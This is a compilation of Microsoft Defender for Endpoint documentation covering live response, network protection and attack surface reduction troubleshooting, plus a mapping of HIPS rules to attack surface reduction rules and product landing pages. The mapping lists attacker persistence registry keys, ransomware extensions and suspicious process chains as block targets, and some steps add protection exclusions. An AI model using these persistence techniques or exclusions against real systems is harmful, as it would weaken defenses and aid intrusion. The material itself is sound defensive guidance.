Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Defender for Endpoint? Sign up for a free trial.

This page provides detailed steps to troubleshoot live response issues.

File can't be accessed during live response sessions

If, while trying to take an action during a live response session, you encounter an error
message stating that the file can't be accessed, take the following steps to address the
issue.

1. Copy the following script code snippet and save it as a PS1 file:

PowerShell

# Copy the file passed as the first argument into the TEMP folder, so the live
# response action can be run against the copy instead of the locked original.
$copied_file_path = $args[0]
$action = Copy-Item $copied_file_path -Destination $env:TEMP -PassThru -ErrorAction SilentlyContinue

if ($action) {
    Write-Host "You copied the file specified in $copied_file_path to $env:TEMP Successfully"
}
else {
    # Copy-Item failed; report the most recent error so the cause is visible in the session output.
    Write-Output "Error occurred while trying to copy a file, details:"
    Write-Output $error[0].exception.message
}

2. Add the script to the live response library.

3. Run the script with one parameter: the file path of the file to be copied.
4. Navigate to your TEMP folder.

5. Run the action you wanted to take on the copied file.

Slow live response sessions or delays during initial connections

Live response uses Defender for Endpoint sensor registration with the WNS service in
Windows. If you're having connectivity issues with live response, confirm the following
details:

1. WpnService (Windows Push Notifications System Service) isn't disabled.

2. WpnService connectivity with the WNS cloud isn't disabled via group policy or MDM
setting. 'Turn off notifications network usage' shouldn't be set to 1.

Refer to the following articles to fully understand the WpnService service behavior and
requirements:

Windows Push Notification Services (WNS) overview
Enterprise Firewall and Proxy Configurations to Support WNS Traffic
Microsoft Push Notifications Service (MPNS) Public IP ranges


Collect support logs in Microsoft Defender for Endpoint using live response
Article • 07/18/2023

Applies to:

Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Defender for Endpoint? Sign up for a free trial.

When contacting support, you may be asked to provide the output package of the
Microsoft Defender for Endpoint Client Analyzer tool.

This topic provides instructions on how to run the tool via Live Response.

1. Download and fetch the required scripts available from within the 'Tools'
subdirectory of the Microsoft Defender for Endpoint Client Analyzer.
For example, to get the basic sensor and device health logs, fetch
"..\Tools\MDELiveAnalyzer.ps1".
If you also require Defender Antivirus support logs (MpSupportFiles.cab), then
fetch "..\Tools\MDELiveAnalyzerAV.ps1".

2. Initiate a Live Response session on the machine you need to investigate.

3. Select Upload file to library.

4. Select Choose file.

5. Select the downloaded file named MDELiveAnalyzer.ps1 and then select Confirm.

6. While still in the LiveResponse session, use the commands below to run the
analyzer and collect the result file:

Console

Run MDELiveAnalyzer.ps1
GetFile "C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\Downloads\MDEClientAnalyzerResult.zip"

Note

The latest preview version of MDEClientAnalyzer can be downloaded here: https://aka.ms/Betamdeanalyzer.

The LiveAnalyzer script downloads the troubleshooting package on the destination machine from: https://mdatpclientanalyzer.blob.core.windows.net.

If you cannot allow the machine to reach the above URL, then upload the MDEClientAnalyzerPreview.zip file to the library before running the LiveAnalyzer script:

Console

PutFile MDEClientAnalyzerPreview.zip -overwrite
Run MDELiveAnalyzer.ps1
GetFile "C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\Downloads\MDEClientAnalyzerResult.zip"

For more information on gathering data locally on a machine in case the machine isn't communicating with Microsoft Defender for Endpoint cloud services, or does not appear in the Microsoft Defender for Endpoint portal as expected, see Verify client connectivity to Microsoft Defender for Endpoint service URLs.

As described in Live response command examples, you may want to use the
'&' symbol at the end of the command to collect logs as a background action:

Console

Run MDELiveAnalyzer.ps1&

See also
Client analyzer overview
Download and run the client analyzer
Run the client analyzer on Windows
Run the client analyzer on macOS or Linux
Data collection for advanced troubleshooting on Windows
Understand the analyzer HTML report


Troubleshoot network protection
Article • 02/16/2024

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Tip

Want to experience Defender for Endpoint? Sign up for a free trial.

This article provides troubleshooting information for network protection, in cases such as:

Network protection blocks a website that is safe (false positive)
Network protection fails to block a suspicious or known malicious website (false negative)

There are four steps to troubleshooting these problems:

1. Confirm prerequisites
2. Use audit mode to test the rule
3. Add exclusions for the specified rule (for false positives)
4. Submit support logs

Confirm prerequisites
Network protection works on devices with the following conditions:

Endpoints are running Windows 10 Pro or Enterprise edition, version 1709 or higher.
Endpoints are using Microsoft Defender Antivirus as the sole antivirus protection app. See what happens when you're using a non-Microsoft antivirus solution.
Real-time protection is enabled.
Cloud-delivered protection is enabled.
Audit mode isn't enabled. Use Group Policy to set the rule to Disabled (value: 0).

Use audit mode

You can enable network protection in audit mode and then visit a website that's
designed to demo the feature. All website connections are allowed by network
protection but an event is logged to indicate any connection that would be blocked if
network protection were enabled.

1. Set network protection to Audit mode.

PowerShell

Set-MpPreference -EnableNetworkProtection AuditMode

2. Perform the connection activity that is causing an issue (for example, attempt to
visit the site, or connect to the IP address you do or don't want to block).

3. Review the network protection event logs to see if the feature would block the
connection if it were set to Enabled.

If network protection isn't blocking a connection that you're expecting it should block, enable the feature.

PowerShell

Set-MpPreference -EnableNetworkProtection Enabled

Report a false positive or false negative

If you've tested the feature with the demo site and with audit mode, and network
protection is working on preconfigured scenarios, but isn't working as expected for a
specific connection, use the Windows Defender Security Intelligence web-based
submission form to report a false negative or false positive for network protection.
With an E5 subscription, you can also provide a link to any associated alert.

See Address false positives/negatives in Microsoft Defender for Endpoint.

Add exclusions
The current exclusion options are:

1. Setting up a custom allow indicator.

2. Using IP exclusions: Add-MpPreference -ExclusionIpAddress 192.168.1.1.

3. Excluding an entire process. For more information, see Microsoft Defender
Antivirus exclusions.

Collect diagnostic data for file submissions

When you report a problem with network protection, you're asked to collect and submit
diagnostic data for Microsoft support and engineering teams to help troubleshoot
issues.

1. Open an elevated command prompt and change to the Windows Defender directory:

Console

cd c:\program files\windows defender

2. Run this command to generate the diagnostic logs:

Console

mpcmdrun -getfiles

3. Attach the file to the submission form. By default, diagnostic logs are saved at C:\ProgramData\Microsoft\Windows Defender\Support\MpSupportFiles.cab.

Resolve connectivity issues with network protection (for E5 customers)
Due to the environment where network protection runs, Microsoft is unable to see your
operating system proxy settings. In some cases, network protection clients are unable to
reach the cloud service. To resolve connectivity issues with network protection, configure
one of the following registry keys so that network protection becomes aware of the
proxy configuration:

PowerShell

Set-MpPreference -ProxyServer <proxy IP address: Port>

---OR---

PowerShell

Set-MpPreference -ProxyPacUrl <Proxy PAC url>

You can configure the registry key by using PowerShell, Microsoft Configuration
Manager, or Group Policy. Here are some resources to help:

Working with Registry Keys
Configure custom client settings for Endpoint Protection
Use Group Policy settings to manage Endpoint Protection

See also
Network protection
Network protection and the TCP three-way handshake
Evaluate network protection
Enable network protection
Address false positives/negatives in Defender for Endpoint


Troubleshoot attack surface reduction rules
Article • 02/16/2024

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Defender for Endpoint? Sign up for a free trial.

When you use attack surface reduction rules you might run into issues, such as:

A rule blocks a file or process, or performs some other action that it shouldn't (false positive)
A rule doesn't work as described, or doesn't block a file or process that it should (false negative)

There are four steps to troubleshooting these problems:

1. Confirm prerequisites
2. Use audit mode to test the rule
3. Add exclusions for the specified rule (for false positives)
4. Submit support logs

Confirm prerequisites
Attack surface reduction rules only work on devices with the following conditions:

Endpoints are running Windows 10 Enterprise or later.

Endpoints are using Microsoft Defender Antivirus as the sole antivirus protection
app. Using any other antivirus app causes Microsoft Defender Antivirus to disable
itself.

Real-time protection is enabled.

Audit mode isn't enabled. Use Group Policy to set the rule to Disabled (value: 0) as
described in Enable attack surface reduction rules.

If these prerequisites are met, proceed to the next step to test the rule in audit mode.

Use audit mode to test the rule
Follow these instructions in Use the demo tool to see how attack surface reduction rules
work to test the specific rule you're encountering problems with.

1. Enable audit mode for the specific rule you want to test. Use Group Policy to set
the rule to Audit mode (value: 2) as described in Enable attack surface reduction
rules. Audit mode allows the rule to report the file or process, but allows it to run.

2. Perform the activity that is causing an issue (for example, open or execute the file
or process that should be blocked but is being allowed).

3. Review the attack surface reduction rule event logs to see if the rule would block
the file or process if the rule were set to Enabled.

If a rule isn't blocking a file or process that you're expecting it should block, first check if
audit mode is enabled.

Audit mode might be enabled for testing another feature, or by an automated PowerShell script, and might not be disabled after the tests were completed.
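A script for the audit-mode step of this section and of the 'Use audit mode' section in the network protection troubleshooting article, added here as an example that is not part of the Microsoft articles. It assumes the documented Defender Operational log event IDs (1121/1122 for attack surface reduction block/audit, 1125/1126 for network protection audit/block) and the Get-MpPreference and Get-MpComputerStatus cmdlets from the Defender module.

```powershell
# Added example, not from the Microsoft articles: checks the audit-mode prerequisites and
# then lists the audit/block events that show whether network protection or an attack
# surface reduction rule would have acted on the activity you just reproduced.
# Event IDs are the documented ones in Microsoft-Windows-Windows Defender/Operational:
#   1121 ASR rule blocked, 1122 ASR rule audited, 1125 NP audited, 1126 NP blocked.
param([int]$Hours = 24)

$status = Get-MpComputerStatus
$pref   = Get-MpPreference

# Prerequisites both articles list (AMRunningMode is 'Normal' only when Defender AV is the
# active engine; MAPSReporting 0 means cloud-delivered protection is off).
'{0,-45} {1}' -f 'Defender AV active (AMRunningMode=Normal):', ($status.AMRunningMode -eq 'Normal')
'{0,-45} {1}' -f 'Real-time protection enabled:',              $status.RealTimeProtectionEnabled
'{0,-45} {1}' -f 'Cloud-delivered protection enabled:',        ($pref.MAPSReporting -ne 0)
'{0,-45} {1}' -f 'Network protection (0=Off 1=Block 2=Audit):', $pref.EnableNetworkProtection

# ASR rules still in audit mode (action 2): pair each GUID with its action by index.
$inAudit = for ($i = 0; $i -lt $pref.AttackSurfaceReductionRules_Ids.Count; $i++) {
    if ([int]$pref.AttackSurfaceReductionRules_Actions[$i] -eq 2) { $pref.AttackSurfaceReductionRules_Ids[$i] }
}
"ASR rules in audit mode: " + $(if ($inAudit) { $inAudit -join ', ' } else { 'none' })

# Pull the relevant events from the last $Hours hours.
$events = Get-WinEvent -ErrorAction SilentlyContinue -FilterHashtable @{
    LogName   = 'Microsoft-Windows-Windows Defender/Operational'
    Id        = 1121, 1122, 1125, 1126
    StartTime = (Get-Date).AddHours(-$Hours)
}
if (-not $events) { "No ASR/network protection events in the last $Hours hours."; return }

"`nTime                 Kind       Details"
foreach ($e in $events) {
    $kind = switch ($e.Id) { 1121 { 'ASR block' } 1122 { 'ASR audit' } 1125 { 'NP audit ' } 1126 { 'NP block ' } }
    # The event payload carries the rule ID / target and the initiating process in its
    # leading properties; printing them raw avoids depending on the exact field order.
    $details = ($e.Properties | Select-Object -First 6 | ForEach-Object { $_.Value }) -join ' | '
    '{0:yyyy-MM-dd HH:mm:ss}  {1}  {2}' -f $e.TimeCreated, $kind, $details
}
```

An audit event (1122 or 1125) for the reproduced activity means the rule would block it once set to Enabled; no event at all usually points back to the prerequisite checks printed first.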

If you've tested the rule with the demo tool and with audit mode, and attack surface
reduction rules are working on preconfigured scenarios, but the rule isn't working as
expected, proceed to either of the following sections based on your situation:

1. If the attack surface reduction rule is blocking something that it shouldn't block
(also known as a false positive), you can first add an attack surface reduction rule
exclusion.

2. If the attack surface reduction rule isn't blocking something that it should block
(also known as a false negative), you can proceed immediately to the last step,
collecting diagnostic data and submitting the issue to us.

Add exclusions for a false positive

If the attack surface reduction rule is blocking something that it shouldn't block (also
known as a false positive), you can add exclusions to prevent attack surface reduction
rules from evaluating the excluded files or folders.

To add an exclusion, see Customize Attack surface reduction.

Important

You can specify individual files and folders to be excluded, but you cannot specify
individual rules. This means any files or folders that are excluded will be excluded
from all ASR rules.

Report a false positive or false negative

Use the Microsoft Security Intelligence web-based submission form to report a false
negative or false positive for network protection. With a Windows E5 subscription, you
can also provide a link to any associated alert.

Collect diagnostic data for file submissions

When you report a problem with attack surface reduction rules, you're asked to collect
and submit diagnostic data that can be used by Microsoft support and engineering
teams to help troubleshoot issues.

1. Open an elevated command prompt and change to the Windows Defender directory:

Console

cd "c:\program files\Windows Defender"

2. Run this command to generate the diagnostic logs:

Console

mpcmdrun -getfiles

3. By default, they're saved to C:\ProgramData\Microsoft\Windows Defender\Support\MpSupportFiles.cab. Attach the file to the submission form.

Related articles
Attack surface reduction rules
Enable attack surface reduction rules
Evaluate attack surface reduction rules


Migrating from a non-Microsoft HIPS to attack surface reduction rules
Article • 02/22/2024

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2

This article helps you to map common rules to Microsoft Defender for Endpoint.

Scenarios when migrating from a non-Microsoft HIPS product to attack surface reduction rules

Block creation of specific files

Applies to- All processes
Operation- File Creation
Examples of Files/Folders, Registry Keys/Values, Processes, Services- *.zepto, *.odin,
*.locky, *.jaff, *.lukitus, *.wnry, *.krab
Attack Surface Reduction rules- attack surface reduction rules block the attack
techniques and not the Indicators of Compromise (IOC). Blocking a specific file
extension isn't always useful, as it doesn't prevent a device from compromise. It only
partially thwarts an attack until attackers create a new type of extension for the
payload.
Other recommended features- Having Microsoft Defender Antivirus enabled, along
with Cloud Protection and Behavior Analysis is highly recommended. We recommend
that you use other prevention, such as the attack surface reduction rule Use advanced
protection against ransomware, which provides a greater level of protection against
ransomware attacks. Furthermore, Microsoft Defender for Endpoint monitors many of
these registry keys, such as ASEP techniques, which trigger specific alerts. The registry
keys used require a minimum of Local Admin or Trusted Installer privileges before they can be
modified. It's recommended to use a locked-down environment with minimum
administrative accounts or rights. Other system configurations can be enabled,
including Disable SeDebug for nonrequired roles that's part of our wider security
recommendations.

Block creation of specific registry keys

Applies to- All Processes
Processes- N/A
Operation- Registry Modifications
Examples of Files/Folders, Registry Keys/Values, Processes, Services-
\Software,HKCU\Environment\UserInitMprLogonScript,HKLM\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Accessibility\ATs*\StartExe, HKLM\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options*\Debugger,
HKEY_CURRENT_USER\Software\Microsoft\HtmlHelp Author\location,
HKLM\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\SilentProcessExit*\MonitorProcess
Attack Surface Reduction rules- attack surface reduction rules block the attack
techniques and not the Indicators of Compromise (IOC). Blocking a specific file
extension isn't always useful, because it doesn't prevent a device from compromise. It
only partially thwarts an attack until attackers create a new type of extension for the
payload.
Other recommended features- Having Microsoft Defender Antivirus enabled, along
with Cloud Protection and Behavior Analysis is highly recommended. We recommend
you use extra prevention, such as the attack surface reduction rule Use advanced
protection against ransomware. This provides a greater level of protection against
ransomware attacks. Furthermore, Microsoft Defender for Endpoint monitors several
of these registry keys, such as ASEP techniques, which trigger specific alerts.
Additionally, the registry keys used require a minimum of Local Admin or Trusted
Installer privileges before they can be modified. It's recommended to use a locked-down
environment with minimum administrative accounts or rights. Other system
configurations can be enabled, including Disable SeDebug for nonrequired roles that's
part of our wider security recommendations.

Block untrusted programs from running from removable drives

Applies to- Untrusted Programs from USB
Processes- *
Operation- Process Execution
Examples of Files/Folders, Registry Keys/Values, Processes, Services-
Attack Surface Reduction rules- attack surface reduction rules have a built-in rule to
prevent the launch of untrusted and unsigned programs from removable drives: Block
untrusted and unsigned processes that run from USB, GUID b2b3f03d-6a65-4f7b-a9c7-
1c7ef74a9ba4.
Other recommended features- Please explore more controls for USB devices and other removable media using Microsoft Defender for Endpoint: How to control USB devices and other removable media using Microsoft Defender for Endpoint.

Block Mshta from launching certain child processes

Applies to- Mshta
Processes- mshta.exe
Operation- Process Execution
Examples of Files/Folders, Registry Keys/Values, Processes, Services- powershell.exe,
cmd.exe, regsvr32.exe
Attack Surface Reduction rules- attack surface reduction rules don't contain any
specific rule to prevent child processes from mshta.exe. This control is within the remit
of Exploit Protection or Windows Defender Application Control.
Other recommended features- Enable Windows Defender Application Control to
prevent mshta.exe from being executed altogether. If your organization requires
mshta.exe for line of business apps, configure a specific Windows Defender Exploit
Protection rule, to prevent mshta.exe from launching child processes.

Block Outlook from launching child processes

Applies to- Outlook
Processes- outlook.exe
Operation- Process Execution
Examples of Files/Folders, Registry Keys/Values, Processes, Services- powershell.exe
Attack Surface Reduction rules- attack surface reduction rules have a built-in rule to
prevent Office communication apps (Outlook, Skype, and Teams) from launching child
processes: Block Office communication application from creating child processes, GUID
26190899-1602-49e8-8b27-eb1d0a1ce869.
Other recommended features- We recommend enabling PowerShell constrained
language mode to minimize the attack surface from PowerShell.

Block Office Apps from launching child processes

Applies to- Office
Processes- winword.exe, powerpnt.exe, excel.exe
Operation- Process Execution
Examples of Files/Folders, Registry Keys/Values, Processes, Services- powershell.exe,
cmd.exe, wscript.exe, mshta.exe, EQNEDT32.EXE, regsvr32.exe
Attack Surface Reduction rules- attack surface reduction rules have a built-in rule to
prevent Office apps from launching child processes: Block all Office applications from
creating child processes, GUID d4f940ab-401b-4efc-aadc-ad5f3c50688a.
Other recommended features- N/A

Block Office Apps from creating executable content

Applies to- Office
Processes- winword.exe, powerpnt.exe, excel.exe
Operation- File Creation
Examples of Files/Folders, Registry Keys/Values, Processes, Services-
C:\Users*\AppData**.exe, C:\ProgramData**.exe, C:\ProgramData**.com,
C:\UsersAppData\Local\Temp**.com, C:\Users\Downloads**.exe,
C:\Users*\AppData**.scf, C:\ProgramData**.scf, C:\Users\Public*.exe,
C:\Users*\Desktop***.exe
Attack Surface Reduction rules- N/A.

Block Wscript from reading certain types of files

Applies to- Wscript
Processes- wscript.exe
Operation- File Read
Examples of Files/Folders, Registry Keys/Values, Processes, Services-
C:\Users*\AppData**.js, C:\Users*\Downloads**.js
Attack Surface Reduction rules- Due to reliability and performance issues, attack surface reduction rules don't have the capability to prevent a specific process from reading a certain script file type. There are two rules that prevent attack vectors that might originate from these scenarios: Block JavaScript or VBScript from launching downloaded executable content (GUID d3e037e1-3eb8-44c8-a917-57927947596d) and Block execution of potentially obfuscated scripts (GUID 5beb7efe-fd9a-4556-801d-275e5ffc04cc).
Other recommended features- Though there are specific attack surface reduction
rules that mitigate certain attack vectors within these scenarios, it's important to
mention that AV is able by default to inspect scripts (PowerShell, Windows Script Host,
JavaScript, VBScript, and more) in real time, through the Antimalware Scan Interface
(AMSI). More info is available here: Antimalware Scan Interface (AMSI).

Block launch of child processes

Applies to- Adobe Acrobat
Processes- AcroRd32.exe, Acrobat.exe
Operation- Process Execution
Examples of Files/Folders, Registry Keys/Values, Processes, Services- cmd.exe,
powershell.exe, wscript.exe
Attack Surface Reduction rules- attack surface reduction rules allow blocking Adobe
Reader from launching child processes. The rule name is Block Adobe Reader from
creating child processes, GUID 7674ba52-37eb-4a4f-a9a1-f0f9a1619a2c.
Other recommended features- N/A

Block download or creation of executable content

Applies to- CertUtil: Block download or creation of executable
Processes- certutil.exe
Operation- File Creation
Examples of Files/Folders, Registry Keys/Values, Processes, Services- *.exe
Attack Surface Reduction rules- attack surface reduction rules don't support these
scenarios because they're a part of Microsoft Defender Antivirus protection.
Other recommended features- Microsoft Defender Antivirus prevents CertUtil from
creating or downloading executable content.

Block processes from stopping critical System components

Applies to- All Processes
Processes- *
Operation- Process Termination
Examples of Files/Folders, Registry Keys/Values, Processes, Services- MsSense.exe,
MsMpEng.exe, NisSrv.exe, svchost.exe*, services.exe, csrss.exe, smss.exe, wininit.exe,
and more.
Attack Surface Reduction rules- attack surface reduction rules don't support these
scenarios because they're protected with Windows built-in security protections.
Other recommended features- ELAM (Early Launch AntiMalware), PPL (Protected Process Light), PPL AntiMalware Light, and System Guard.

Block specific launch Process Attempt

Applies to- Specific Processes
Processes- Name your Process
Operation- Process Execution
Examples of Files/Folders, Registry Keys/Values, Processes, Services- tor.exe,
bittorrent.exe, cmd.exe, powershell.exe, and more
Attack Surface Reduction rules- Overall, attack surface reduction rules aren't
designed to function as an Application manager.
Other recommended features- To prevent users from launching specific processes or programs, it's recommended to use Windows Defender Application Control. Microsoft Defender for Endpoint file and certificate indicators can be used in an incident response scenario (they shouldn't be seen as an application control mechanism).

Block unauthorized changes to Microsoft Defender Antivirus configurations

Applies to- All Processes
Processes- *
Operation- Registry Modifications
Examples of Files/Folders, Registry Keys/Values, Processes, Services-
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware,
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Policy
Manager\AllowRealTimeMonitoring, and so on.
Attack Surface Reduction rules- attack surface reduction rules don't cover these
scenarios because they're part of the Microsoft Defender for Endpoint built-in
protection.
Other recommended features- Tamper Protection (opt-in, managed from Intune)
prevents unauthorized changes to DisableAntiVirus, DisableAntiSpyware,
DisableRealtimeMonitoring, DisableOnAccessProtection, DisableBehaviorMonitoring,
and DisableIOAVProtection registry keys (and more).
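A staging script for the built-in rules named in the mapping above, added here as an example that is not part of the Microsoft article. It uses only the rule GUIDs quoted on this page together with the Add-MpPreference and Get-MpPreference cmdlets from the Defender module; the 'Use advanced protection against ransomware' rule is left out because its GUID isn't listed here.

```powershell
# Added example, not from the Microsoft article: put the built-in ASR rules named in the
# HIPS mapping above into audit mode first, then read the effective configuration back so
# the migration can be verified before any rule is switched to Block. Run elevated.
# Rule GUIDs below are the ones quoted in the sections above.

$rules = [ordered]@{
    'Block untrusted and unsigned processes that run from USB'                  = 'b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4'
    'Block Office communication application from creating child processes'     = '26190899-1602-49e8-8b27-eb1d0a1ce869'
    'Block all Office applications from creating child processes'              = 'd4f940ab-401b-4efc-aadc-ad5f3c50688a'
    'Block JavaScript or VBScript from launching downloaded executable content' = 'd3e037e1-3eb8-44c8-a917-57927947596d'
    'Block execution of potentially obfuscated scripts'                         = '5beb7efe-fd9a-4556-801d-275e5ffc04cc'
    'Block Adobe Reader from creating child processes'                          = '7674ba52-37eb-4a4f-a9a1-f0f9a1619a2c'
}

# Action values accepted by -AttackSurfaceReductionRules_Actions:
# 0 = Disabled, 1 = Block, 2 = AuditMode, 6 = Warn
$auditMode = 2

foreach ($entry in $rules.GetEnumerator()) {
    # Add-MpPreference adds to (or updates the action of) the existing rule list,
    # unlike Set-MpPreference, which replaces the whole list.
    Add-MpPreference -AttackSurfaceReductionRules_Ids $entry.Value `
                     -AttackSurfaceReductionRules_Actions $auditMode
    "Staged in audit mode: $($entry.Key)"
}

# Read back what is actually in effect and map GUID -> rule name for the report.
$pref  = Get-MpPreference
$byId  = @{}
foreach ($kv in $rules.GetEnumerator()) { $byId[$kv.Value.ToLower()] = $kv.Key }
$names = @{ 0 = 'Disabled'; 1 = 'Block'; 2 = 'Audit'; 6 = 'Warn' }

"`nEffective ASR configuration:"
for ($i = 0; $i -lt $pref.AttackSurfaceReductionRules_Ids.Count; $i++) {
    $id   = $pref.AttackSurfaceReductionRules_Ids[$i]
    $name = if ($byId.ContainsKey($id.ToLower())) { $byId[$id.ToLower()] } else { '(rule not in this mapping)' }
    '{0,-8} {1}  {2}' -f $names[[int]$pref.AttackSurfaceReductionRules_Actions[$i]], $id, $name
}

# A mapped rule missing from the effective list did not apply locally (for example, ASR is
# managed by Intune or Group Policy and local changes are ignored). Report those explicitly.
$missing = $rules.GetEnumerator() | Where-Object { $pref.AttackSurfaceReductionRules_Ids -notcontains $_.Value }
foreach ($m in $missing) { "NOT APPLIED: $($m.Key) ($($m.Value))" }
```

After the audit period, re-run the troubleshooting article's event review for event ID 1122 before changing any rule's action to 1 (Block).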

See also

Attack surface reduction FAQ
Enable attack surface reduction rules
Evaluate attack surface reduction rules


Microsoft Defender XDR
Learn about the robust security solutions in Microsoft Defender XDR so that you can better protect your enterprise across attack surfaces.

Microsoft Defender XDR

OVERVIEW
What is Microsoft Defender XDR?

WHAT'S NEW
What's new in Microsoft Defender XDR

VIDEO
Overview video

Evaluate capabilities

GET STARTED
Create a trial lab
Run pilot project in production

Get started

GET STARTED
Get started with Microsoft Defender XDR

DEPLOY
Turn on Microsoft Defender XDR
Deploy supported services
Setup guides for Microsoft Defender XDR

Microsoft Defender for Identity

OVERVIEW
What is Microsoft Defender for Identity?
Microsoft Defender for Identity architecture

Microsoft Defender for Office 365

OVERVIEW
What is Microsoft Defender for Office 365?
Microsoft Defender for Office 365 service description
Microsoft Defender for Office 365 in Microsoft Defender XDR
Redirecting Microsoft Defender for Office 365 in Microsoft Defender XDR

Microsoft Defender for Endpoint

OVERVIEW
What is Microsoft Defender for Endpoint?
Defender for Endpoint in Microsoft Defender XDR
Redirecting Defender for Endpoint in Microsoft Defender XDR

Microsoft Defender for Cloud Apps

OVERVIEW
What is Microsoft Defender for Cloud Apps?
Get started with Microsoft Defender for Cloud Apps

Manage incidents and alerts

OVERVIEW
Investigate incidents
Track and respond to emerging threats
Automated investigation and response
Hunt for threats

Reference

REFERENCE
Microsoft Defender XDR APIs


Microsoft Defender for Office 365 documentation
Learn about the robust security solutions in Defender for Office 365 to better protect your email and collaboration tools.

Defender for Office 365 & Exchange Online Protection

OVERVIEW
Microsoft Defender for Office 365 overview
Exchange Online Protection overview
EOP & Defender for Office 365 security comparison
What's new in Defender for Office 365

Get started with Defender for Office 365

GET STARTED
Get started with Defender for Office 365
Preset security policies in EOP and Defender for Office 365
Recommended policy settings for EOP and Defender for Office 365
Configuration analyzer in EOP and Defender for Office 365

Evaluate Defender for Office 365

HOW-TO GUIDE
Try Defender for Office 365
Migrate to Defender for Office 365

Configure email authentication

HOW-TO GUIDE
Set up SPF to help prevent spoofing
Use DKIM to validate outbound email sent from your custom domain
Use DMARC to validate email
Configure trusted ARC sealers

Investigate and respond

HOW-TO GUIDE
Defender for Office 365 SecOps guide


Microsoft Defender for Identity documentation
Microsoft Defender for Identity cloud service helps protect your enterprise hybrid environments from multiple types of advanced targeted cyber attacks and insider threats.

About Microsoft Defender for Identity

OVERVIEW
What is Microsoft Defender for Identity?

ARCHITECTURE
Defender for Identity architecture

WHAT'S NEW
Releases

Check out Defender for Identity alerts

GET STARTED
Security alerts
Manage security alerts
Health issues

Explore different ways to use Defender for Identity

HOW-TO GUIDE
Security posture assessments
Configure detection exclusions
Search and filter monitored activities
Set entity tags
Advanced Threat Analytics (ATA) to Defender for Identity migration

Investigate threats

TUTORIAL
Investigate assets
Investigate lateral movement paths
Remediation actions

Resources and support

REFERENCE
Frequently asked questions
Support
Defender for Identity data security and privacy


Microsoft Defender for Cloud Apps documentation
Microsoft Defender for Cloud Apps is a Cloud Access Security Broker (CASB) that operates on multiple clouds. It provides rich visibility, control over data travel, and sophisticated analytics to identify and combat cyberthreats across all your cloud services.

About Defender for Cloud Apps

OVERVIEW
What is Defender for Cloud Apps?
Top SaaS app use cases
SaaS Security

WHAT'S NEW
Releases

VIDEO
Deployment videos

Get started

QUICKSTART
Get started with Defender for Cloud Apps

REFERENCE
Using the Defender for Cloud Apps REST API
Investigate anomaly detection alerts

Explore our top use cases

TUTORIAL
Detect and manage suspicious activities
Investigate risky users
Investigate risky OAuth apps
Protect any app in your organization in real time
Block download of sensitive information
Protect files with admin quarantine
Apply sensitivity labels from Microsoft Purview Information Protection
Extend governance to endpoint remediation

Concepts

CONCEPT
Protect apps with Conditional Access App Control
Working with the dashboard
Working with App risk scores
Working with discovered apps
Protect connected apps
Manage app governance

Best practices

GET STARTED
Discover and assess cloud apps
Apply cloud governance policies
Limit exposure of shared data and enforce collaboration policies
Discover, classify, label, and protect regulated and sensitive data stored in the cloud
Enforce DLP and compliance policies for data stored in the cloud
Block and protect download of sensitive data to unmanaged or risky devices
Secure collaboration with external users by enforcing real-time session controls
Detect cloud threats, compromised accounts, malicious insiders, and ransomware
Use the audit trail of activities for forensic investigations
Secure IaaS services and custom apps

Discover and control Shadow IT

TUTORIAL
Discover and identify Shadow IT
Evaluate and analyze
Manage your apps

CONCEPT
Working with the dashboard
Working with the discovered apps
Working with App risk scores

DEPLOY
Deploy Cloud Discovery

HOW-TO GUIDE
Integrate with Microsoft Defender for Endpoint
Cloud Discovery enrichment

REFERENCE
Discover and assess cloud apps

VIDEO
Shadow IT discovery beyond the corporate network

Additional resources

TRAINING
Read our e-books
Explore Microsoft 365, a complete solution that includes Defender for Cloud Apps

VIDEO
Watch our webinars


Microsoft Defender for Business
Simple, comprehensive endpoint security to help you protect your small or medium-sized business, so you can focus on what matters. Protect your computers, tablets, and phones with enterprise-grade security at an affordable price. Defender for Business is available as a standalone subscription or as part of Microsoft 365 Business Premium. See what's new at https://aka.ms/cybersecuritysmb.

Overview

OVERVIEW
What is Defender for Business?
What's new in Defender for Business?

Resources for partners

OVERVIEW
Resources for Microsoft partners (security guide and checklist)
Integration with Microsoft 365 Lighthouse

Get started

GET STARTED
Interactive guide - Get started with Microsoft Defender for Business
Get Defender for Business
See the trial user guide
Turn on preview features

Setup information

DEPLOY
Setup and configuration overview
Onboard devices
Set up and review security policies

Operations and maintenance

HOW-TO GUIDE
Maintain your environment
View your reports

Help and more resources

HOW-TO GUIDE
How to get help or contact support
Frequently asked questions
Microsoft Security Intelligence


Microsoft Defender Vulnerability Management
Reduce cyber risk with continuous vulnerability discovery and assessment, risk-based prioritization, and remediation.

Overview

OVERVIEW
What is Microsoft Defender Vulnerability Management?
Compare Microsoft Defender Vulnerability Management offerings

Get started

GET STARTED
Get Defender Vulnerability Management

Discover and explore inventories

HOW-TO GUIDE
Device inventory
Software inventory
Browser extensions
Certificate inventory
Hardware and firmware assessment

Detect and assess threats

HOW-TO GUIDE
Dashboard insights
Exposure score
Microsoft Secure Score for Devices
Security baselines
Hunt for exposed devices
Authenticated scan for Windows

Identify risk and prioritize remediation

HOW-TO GUIDE
Address security recommendations
Network share configuration assessment
Exceptions for security recommendations
Plan for end-of-support software
Mitigate zero-day vulnerabilities
Vulnerabilities in my organization
Event timeline

Track and mitigate remediation activities

HOW-TO GUIDE
Remediate vulnerabilities
Block vulnerable applications
Vulnerable devices report

You might also like